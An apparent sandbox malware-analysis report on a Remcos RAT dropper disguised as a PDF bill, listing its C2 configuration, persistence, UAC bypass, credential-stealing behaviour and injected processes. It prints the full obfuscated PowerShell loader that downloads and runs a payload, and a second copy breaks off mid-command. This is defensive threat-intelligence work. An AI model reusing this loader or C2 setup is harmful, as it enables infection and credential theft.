remcos | fe82beb0109f98def834ac8a0b629e101b011b3635a6353193205d0978a8d765

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2024 01:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11309-電信費電子通知單·pdf.vbs
Size

33KB
MD5

8f747ba4e105ce33a0231ed1eba4d216
SHA1

dd82148b15070781c7412c5abcbb93e727085936
SHA256

26ad41ff15319981a72e1a8e681c3c74fb011583eda81619f4cdf531cf5e221a
SHA512

ea03c366ee9f3e9fcff7afbbb52d41863a582e91c37694d5d37a07025c66966f0f487e4458c3a2aff8ee96bc1e5b6184fd3a4030b61589d1cc74b9c07be6c079
SSDEEP

768:ccuasC3UUmhgcFxKp70GNXaNDkJhZkPkqGM1ZVV1cCirNpVW4:VuasOmGS87NK9kJ/GpBPzcCiz

Score

10^/10

remcos remotehost collection credential_access discovery evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/4560-359-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/5024-357-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1348-356-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1348-356-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/5024-357-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
4	2056	WScript.exe
12	2164	powershell.exe
16	2164	powershell.exe
27	1832	msiexec.exe
32	1832	msiexec.exe
34	1832	msiexec.exe
38	1832	msiexec.exe
40	1832	msiexec.exe
49	1832	msiexec.exe
51	1832	msiexec.exe
52	1832	msiexec.exe
53	1832	msiexec.exe
55	1832	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

Chrome.exemsedge.exemsedge.exeChrome.exeChrome.exeChrome.exemsedge.exemsedge.exemsedge.exe

pid	Process
4232	Chrome.exe
2024	msedge.exe
3124	msedge.exe
2864	Chrome.exe
984	Chrome.exe
4404	Chrome.exe
4732	msedge.exe
748	msedge.exe
3652	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%hydrofyt% -windowstyle 1 $Vedstaaelse=(gp -Path 'HKCU:\\Software\\wuhan\\').Thailndere;%hydrofyt% ($Vedstaaelse)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
7	drive.google.com
12	drive.google.com
27	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

powershell.exepowershell.exe

pid	Process
1876	powershell.exe
2164	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
1832	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
1876	powershell.exe
1832	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 1832 set thread context of 5024	1832	msiexec.exe	139
PID 1832 set thread context of 1348	1832	msiexec.exe	140
PID 1832 set thread context of 4560	1832	msiexec.exe	141

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

msiexec.exepowershell.execmd.exereg.exemsiexec.exemsiexec.exemsiexec.execmd.exereg.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
3928	reg.exe
452	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

pid	Process
2164	powershell.exe
2164	powershell.exe
1876	powershell.exe
1876	powershell.exe
1876	powershell.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
2864	Chrome.exe
2864	Chrome.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
1876	powershell.exe
1832	msiexec.exe
1832	msiexec.exe
1832	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid	Process
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe
2024	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

powershell.exepowershell.exeChrome.exemsiexec.exe

description	pid	Process
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeShutdownPrivilege	2864	Chrome.exe
Token: SeCreatePagefilePrivilege	2864	Chrome.exe
Token: SeDebugPrivilege	4560	msiexec.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Chrome.exemsedge.exe

pid	Process
2864	Chrome.exe
2864	Chrome.exe
2024	msedge.exe
2024	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
1832	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 2056 wrote to memory of 2164	2056	WScript.exe	85
PID 2056 wrote to memory of 2164	2056	WScript.exe	85
PID 1876 wrote to memory of 1832	1876	powershell.exe	102
PID 1876 wrote to memory of 1832	1876	powershell.exe	102
PID 1876 wrote to memory of 1832	1876	powershell.exe	102
PID 1876 wrote to memory of 1832	1876	powershell.exe	102
PID 1832 wrote to memory of 3664	1832	msiexec.exe	105
PID 1832 wrote to memory of 3664	1832	msiexec.exe	105
PID 1832 wrote to memory of 3664	1832	msiexec.exe	105
PID 3664 wrote to memory of 3928	3664	cmd.exe	108
PID 3664 wrote to memory of 3928	3664	cmd.exe	108
PID 3664 wrote to memory of 3928	3664	cmd.exe	108
PID 1832 wrote to memory of 1372	1832	msiexec.exe	110
PID 1832 wrote to memory of 1372	1832	msiexec.exe	110
PID 1832 wrote to memory of 1372	1832	msiexec.exe	110
PID 1372 wrote to memory of 452	1372	cmd.exe	112
PID 1372 wrote to memory of 452	1372	cmd.exe	112
PID 1372 wrote to memory of 452	1372	cmd.exe	112
PID 1832 wrote to memory of 2864	1832	msiexec.exe	114
PID 1832 wrote to memory of 2864	1832	msiexec.exe	114
PID 2864 wrote to memory of 2752	2864	Chrome.exe	115
PID 2864 wrote to memory of 2752	2864	Chrome.exe	115
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 5072	2864	Chrome.exe	116
PID 2864 wrote to memory of 3932	2864	Chrome.exe	117
PID 2864 wrote to memory of 3932	2864	Chrome.exe	117
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118
PID 2864 wrote to memory of 4804	2864	Chrome.exe	118

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11309-電信費電子通知單·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kulturcentre229='Genapper';;$Labourability='Supplikant';;$Acquiet='Ulykkestilflde';;$Axial='Tarvs';;$agoraers=$host.Name;function Perlers($Morphically){If ($agoraers) {$Brugertesten=4} for ($Tomrum=$Brugertesten;;$Tomrum+=5){if(!$Morphically[$Tomrum]) { break };$Choriomas+=$Morphically[$Tomrum];$Murkrans='Fjortendedeles'}$Choriomas}function reservelgernes($Tomrumnaugurere){ .($Recruits) ($Tomrumnaugurere)}$Essentiality=Perlers 'HalvNDesieO laTHu.k.hy,nW';$Essentiality+=Perlers 'R ndeSa.gBT rmcDiatlBloki,erreFondnDataT';$Osmundaceous=Perlers 'Ru gMekseoTeksz Anai ethlFor.l T.vaBe,a/';$Forspises=Perlers ' B,jTFortlGours Ste1 Uma2';$Dispersionens100=' V c[Myo n olkE FretHels.Pyols ForeKsner DysVLittiBakkcRvreeFranpInsuOJordIRhe N Ha TAbriMS.etaFe eN St aO erGCifrE citRVeal]B gl:Fo e:mezzs,apoE T lcOutpuSa,drQua iGaraTUnreyk mpPUnberNonro.loptCortONon cslavoFragL,lin= Pol$DrunFAdv o.verRHarpSF,ndPP atIInd Sdag eGen.s';$Osmundaceous+=Perlers 'Katt5Path.S ru0 in I on(VasiWSinii SepnUdrydAlgioA.rewOpvosPast Hy iNOuteT pa Bux 1Un o0Mode.Tape0Unde;A ty ConWor viStornUng,6vi s4M.rc;Proe AutoxHesp6Pirn4Fe a; U.h IntarundevLamp:Arbe1Fur 3Fire1Sore.Muti0Snee) Eru orkGdad eSo,tc Groksi koV.ks/ Po.2forp0 Fe 1Germ0 Var0To.s1 De,0Nons1Bell PresF SoliDykkrPri.eUndefDyneoArbuxProg/J,mm1 .as3Unpr1Tort.Sal,0';$Archispermae=Perlers 'Kat,USy.oSS.alEBevgrSr,e- Paaa Bn GAstiEStttnSh.eT';$Bortadoptkmr=Perlers 'Und hTrictL getp eapEghjsDive: Oma/F rl/Tarod monr uliiI.flvVinde kst.evang MesoElonoManug IndlStu eTrop.befrcLithoBj,rmNon /Hneku Intcemer?Inkse AanxHal p veoH glr ap t Pse=svindZo noblinw B inOphvl ouso SekaPlowd S r&H roiWavedfri = Fyl1 pleGCneonA beY,eri3.orthNat jVrisbSupe3.erfSSitupP oaLStr ANon,bRoad9StocaBabeFa,suzSyndIDaglpDesuoTach9Has rByggUM ni3UceniTri TVerngMetau ncuxTubua Omb5SpriQ';$Mosgroet=Perlers 'Qui,>';$Recruits=Perlers 'FireIEndoeKuvex';$Tomrumnopinate='Skrubtudsen';$Plettedes207='\Oratoriers.Dia';reservelgernes (Perlers 'Sek.$Plagg TomlSamvOFortBSubdAoutrlFabr:C imPPin A WhecP,izH SkoyGennd.npoERenor ydMStataAs.rt SubO,orsIAmusdPapi= Ba $ Tr eE,urNStveV Rev:Bar ADestP sadP BrnDf mmaSlobtMedgaSkrh+Valm$A blPMuscL RegetabeT adotDenaeTereD,ondevirksudsy2 S.a0Scyp7');reservelgernes (Perlers 'aman$SamigBlanL nfOS.atB Pe AMissLHunk: MiraSambFMerfdMiniEVestLDichI tern arrg BruEDragr AfkNU.lieDangsStet= Bor$ SmaB PsaOImmeRRabaTCollAUd adForvOLat.PboliTRestKVitamDetorAdel. BeuSSaviPVigolIm,oIoverTBrev(pul $VarmMStemO Bi SRebaG krrNormOWomae PosTR wa)');reservelgernes (Perlers $Dispersionens100);$Bortadoptkmr=$Afdelingernes[0];$Bloedite=(Perlers ' ngl$Sy tGGib lrethoAfskBklipAKr eL yod: TraUSt.annonpAStyrP UniPHet lNoneiX,liqBelyU soneUn oDLorg=Be,oNMetaEUnsmwFrar-Nekro,uchbFantJElimeStorCDur t Snb S ltSSarcyKongsFibrTakv EMukam Dow. San$AbeneSaldsfrdiS S dE Cl.n JultsheeiKo.tAGassl,rneIToo T epuY');reservelgernes ($Bloedite);reservelgernes (Perlers 'unde$GrubUBen.nBru aNeutpBol p ChalSteriMesiqEntuu V leundodCent.MosqH W,ceSpeja g.ndArbeeReporAn es No [R,nt$BathATilprMillcKreshGen iPolosVegepMangeElger RigmTraia KrueGari]Del =hart$ ebO Cups OutmMetauSc,enHyped Cema hitc Dine Obeo oguKonss');$Inditer=Perlers 'Kvrn$Pre UBogsnOpenaPlumpMickpResml,akki AllqKo buUn.keEm adQ.ad.dis D notoUdskwSkinnEleflReavoSagia Trid conFPilliKnoxlFabrePoly(,oly$ heB ToooGaupr albt F ia LusdSalvorjsepCraztCelek Babmcentrydel,Brak$B ndUByttn ensi VotbMarcaMinin,ntikPubl)';$Unibank=$Pachydermatoid;reservelgernes (Perlers 'Forl$DekaGGum.lFl dO HarbForsAModel Ale:Teg SddmayOxamNKvajSAwabmV ndnPiscdFrdiEPr,onP.steJasm=U.co( ChetAngreSimuSadjutTran-San PFabja pecT UntH Lil ,rap$ForkuHypeNSemeIUd,rBpoddAArmsNRangkPara)');while (!$Synsmndene) {reservelgernes (Perlers ' Fin$Be kg Im lD deoTrukbAnlga NytlBarb:F.rhgskoeeAgtsn Fri= L.k$PyopS tentIr eaB oov O,er etaeBevgrmeeks') ;reservelgernes $Inditer;reservelgernes (Perlers 'BlomsBandT Am,aBinoRAf eTProm-WhoosBlotLNedbeH teE BetP.lam Atom4');reservelgernes (Perlers 'Demo$ lleG,etnLFor oskelb UnvA.lexl ews: Bi SMas,Y.escnAfteS Tenm Sa N eurdPh oeOverNMillePatb=sand( ndetLol.E F dsLer.TKass-UnidpTo,aAPrest Cerhk on Lysk$ StuUR,diNHerbIIdeobRumsa dinnAndokCore)') ;reservelgernes (Perlers ' sla$Aff G ,ffL icO Re bLetfATreplMach:FlorTCrenoMaskIDebrlC.phE polT limtIs ceInkaRPartN Fl EStatS Elu=Fors$ Ky,gAr.hLRug.oBoltBDyn,AKo.pL Ac,:SpedVSljfA EvenLexiDVenufprstOToterAfmaS ciryForsnPreliProcNUnitgSabesmazapCornLVedgaAmounAdeneEx,irAfvaNRa.iEUdto9mi j9till+G us+ vag% bac$Del,A Undf AurdSp ceFllelTromi SliNBarsGMes EWheeRHeten Irae VarSdest.O fscB.rfo ostU UnnNRu,tt') ;$Bortadoptkmr=$Afdelingernes[$Toiletternes]}$Divisionsstykkes=326774;$Hved=29566;reservelgernes (Perlers 'vand$AcnogGau lStoroMindbElevaSvmmLBina:Aff P ,krLAfski gengHorst.agif,elfOLegir eassPe emMan mFolcE O dlFinvSPreaETeg NKlasSPend Ba a=Ca.d Sax.gReinESount,uah-InglCNonmOph,tNcourTC,heeLilbnUndet na Tu,$FnatUPoronKaveI EngbGrupA horNVanwK');reservelgernes (Perlers 'Stu $ PrigImpolEarsoRennb apeaAutolLull:SalaSMawdoA.volForbeGunnnDatoe.mper emmg inai iseJde n.gersFilo Ud y= ns Delt[UndeSopsayHeelsO fitMi,eeBacom Kon.DispCSlyno ifnChefvReine Danr,kattHen ]Udd :Para:Us rFVaporFdseoUdlamChabB GnaaPte,sReche Dep6Pro.4BaskS amt B arC viiFladn ofogParr( Sen$ShapPLgeml BriiMyxogEpidtKramfJug.oSankrW atsSkammRegem,naceTranlB omsSem eSelsnLeucsB is)');reservelgernes (Perlers ' Re,$SerrG P oL ShaO Berb hypAFiellLaun:Ben.u SkrP,ricsFirstupliR NexeSydbeMelaT Amp R.ta=Medi Larr[SadlsAwinYCompsEr vTrequED alMCent.faertCoc,E UndXBandtHof,. SteEGangnUtroCU huO,iegdSquaiI ddnSprogUnde]Fenn:f ri:DetaAPolySKildCLigfI orcIbuty. SengBe.eeFi kTNedss HeaTFordRAfflISka.NPensGTred(Ki s$ kspsMo eOUnpaLAfgnEGhionAd,iEV mpRKamggAkkuI egneI.beNPoetSSnig)');reservelgernes (Perlers 'Hept$AnhigGlasLHavsOOverBSkaaaP,rpLE,tl:E.maB Geni Omro M jgK,raaTrias U,sS eade ofarAutoScond=Stak$Immiu Ri pPhytSFyratFeltRsandeNonjESpi.Tar m. CafS AnoUU.orb.mpls KeytSanirMa aiKassn UdsgSo t(Flyb$AmmoDBivaIBredvPik.IH.isshorniinbuoHomoNProlSCreusNoistsleeY afmkBelakBundE amtsHerk, F r$SluthaculV BrsE StoDJ ne)');reservelgernes $biogassers;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kulturcentre229='Genapper';;$Labourability='Supplikant';;$Acquiet='Ulykkestilflde';;$Axial='Tarvs';;$agoraers=$host.Name;function Perlers($Morphically){If ($agoraers) {$Brugertesten=4} for ($Tomrum=$Brugertesten;;$Tomrum+=5){if(!$Morphically[$Tomrum]) { break };$Choriomas+=$Morphically[$Tomrum];$Murkrans='Fjortendedeles'}$Choriomas}function reservelgernes($Tomrumnaugurere){ .($Recruits) ($Tomrumnaugurere)}$Essentiality=Perlers 'HalvNDesieO laTHu.k.hy,nW';$Essentiality+=Perlers 'R ndeSa.gBT rmcDiatlBloki,erreFondnDataT';$Osmundaceous=Perlers 'Ru gMekseoTeksz Anai ethlFor.l T.vaBe,a/';$Forspises=Perlers ' B,jTFortlGours Ste1 Uma2';$Dispersionens100=' V c[Myo n olkE FretHels.Pyols ForeKsner DysVLittiBakkcRvreeFranpInsuOJordIRhe N Ha TAbriMS.etaFe eN St aO erGCifrE citRVeal]B gl:Fo e:mezzs,apoE T lcOutpuSa,drQua iGaraTUnreyk mpPUnberNonro.loptCortONon cslavoFragL,lin= Pol$DrunFAdv o.verRHarpSF,ndPP atIInd Sdag eGen.s';$Osmundaceous+=Perlers 'Katt5Path.S ru0 in I on(VasiWSinii SepnUdrydAlgioA.rewOpvosPast Hy iNOuteT pa Bux 1Un o0Mode.Tape0Unde;A ty ConWor viStornUng,6vi s4M.rc;Proe AutoxHesp6Pirn4Fe a; U.h IntarundevLamp:Arbe1Fur 3Fire1Sore.Muti0Snee) Eru orkGdad eSo,tc Groksi koV.ks/ Po.2forp0 Fe 1Germ0 Var0To.s1 De,0Nons1Bell PresF SoliDykkrPri.eUndefDyneoArbuxProg/J,mm1 .as3Unpr1Tort.Sal,0';$Archispermae=Perlers 'Kat,USy.oSS.alEBevgrSr,e- Paaa Bn GAstiEStttnSh.eT';$Bortadoptkmr=Perlers 'Und hTrictL getp eapEghjsDive: Oma/F rl/Tarod monr uliiI.flvVinde kst.evang MesoElonoManug IndlStu eTrop.befrcLithoBj,rmNon /Hneku Intcemer?Inkse AanxHal p veoH glr ap t Pse=svindZo noblinw B inOphvl ouso SekaPlowd S r&H roiWavedfri = Fyl1 pleGCneonA beY,eri3.orthNat jVrisbSupe3.erfSSitupP oaLStr ANon,bRoad9StocaBabeFa,suzSyndIDaglpDesuoTach9Has rByggUM ni3UceniTri TVerngMetau ncuxTubua Omb5SpriQ';$Mosgroet=Perlers 'Qui,>';$Recruits=Perlers 'FireIEndoeKuvex';$Tomrumnopinate='Skrubtudsen';$Plettedes207='\Oratoriers.Dia';reservelgernes (Perlers 'Sek.$Plagg TomlSamvOFortBSubdAoutrlFabr:C imPPin A WhecP,izH SkoyGennd.npoERenor ydMStataAs.rt SubO,orsIAmusdPapi= Ba $ Tr eE,urNStveV Rev:Bar ADestP sadP BrnDf mmaSlobtMedgaSkrh+Valm$A blPMuscL RegetabeT adotDenaeTereD,ondevirksudsy2 S.a0Scyp7');reservelgernes (Perlers 'aman$SamigBlanL nfOS.atB Pe AMissLHunk: MiraSambFMerfdMiniEVestLDichI tern arrg BruEDragr AfkNU.lieDangsStet= Bor$ SmaB PsaOImmeRRabaTCollAUd adForvOLat.PboliTRestKVitamDetorAdel. BeuSSaviPVigolIm,oIoverTBrev(pul $VarmMStemO Bi SRebaG krrNormOWomae PosTR wa)');reservelgernes (Perlers $Dispersionens100);$Bortadoptkmr=$Afdelingernes[0];$Bloedite=(Perlers ' ngl$Sy tGGib lrethoAfskBklipAKr eL yod: TraUSt.annonpAStyrP UniPHet lNoneiX,liqBelyU soneUn oDLorg=Be,oNMetaEUnsmwFrar-Nekro,uchbFantJElimeStorCDur t Snb S ltSSarcyKongsFibrTakv EMukam Dow. San$AbeneSaldsfrdiS S dE Cl.n JultsheeiKo.tAGassl,rneIToo T epuY');reservelgernes ($Bloedite);reservelgernes (Perlers 'unde$GrubUBen.nBru aNeutpBol p ChalSteriMesiqEntuu V leundodCent.MosqH W,ceSpeja g.ndArbeeReporAn es No [R,nt$BathATilprMillcKreshGen iPolosVegepMangeElger RigmTraia KrueGari]Del =hart$ ebO Cups OutmMetauSc,enHyped Cema hitc Dine Obeo oguKonss');$Inditer=Perlers 'Kvrn$Pre UBogsnOpenaPlumpMickpResml,akki AllqKo buUn.keEm adQ.ad.dis D notoUdskwSkinnEleflReavoSagia Trid conFPilliKnoxlFabrePoly(,oly$ heB ToooGaupr albt F ia LusdSalvorjsepCraztCelek Babmcentrydel,Brak$B ndUByttn ensi VotbMarcaMinin,ntikPubl)';$Unibank=$Pachydermatoid;reservelgernes (Perlers 'Forl$DekaGGum.lFl dO HarbForsAModel Ale:Teg SddmayOxamNKvajSAwabmV ndnPiscdFrdiEPr,onP.steJasm=U.co( ChetAngreSimuSadjutTran-San PFabja pecT UntH Lil ,rap$ForkuHypeNSemeIUd,rBpoddAArmsNRangkPara)');while (!$Synsmndene) {reservelgernes (Perlers ' Fin$Be kg Im lD deoTrukbAnlga NytlBarb:F.rhgskoeeAgtsn Fri= L.k$PyopS tentIr eaB oov O,er etaeBevgrmeeks') ;reservelgernes $Inditer;reservelgernes (Perlers 'BlomsBandT Am,aBinoRAf eTProm-WhoosBlotLNedbeH teE BetP.lam Atom4');reservelgernes (Perlers 'Demo$ lleG,etnLFor oskelb UnvA.lexl ews: Bi SMas,Y.escnAfteS Tenm Sa N eurdPh oeOverNMillePatb=sand( ndetLol.E F dsLer.TKass-UnidpTo,aAPrest Cerhk on Lysk$ 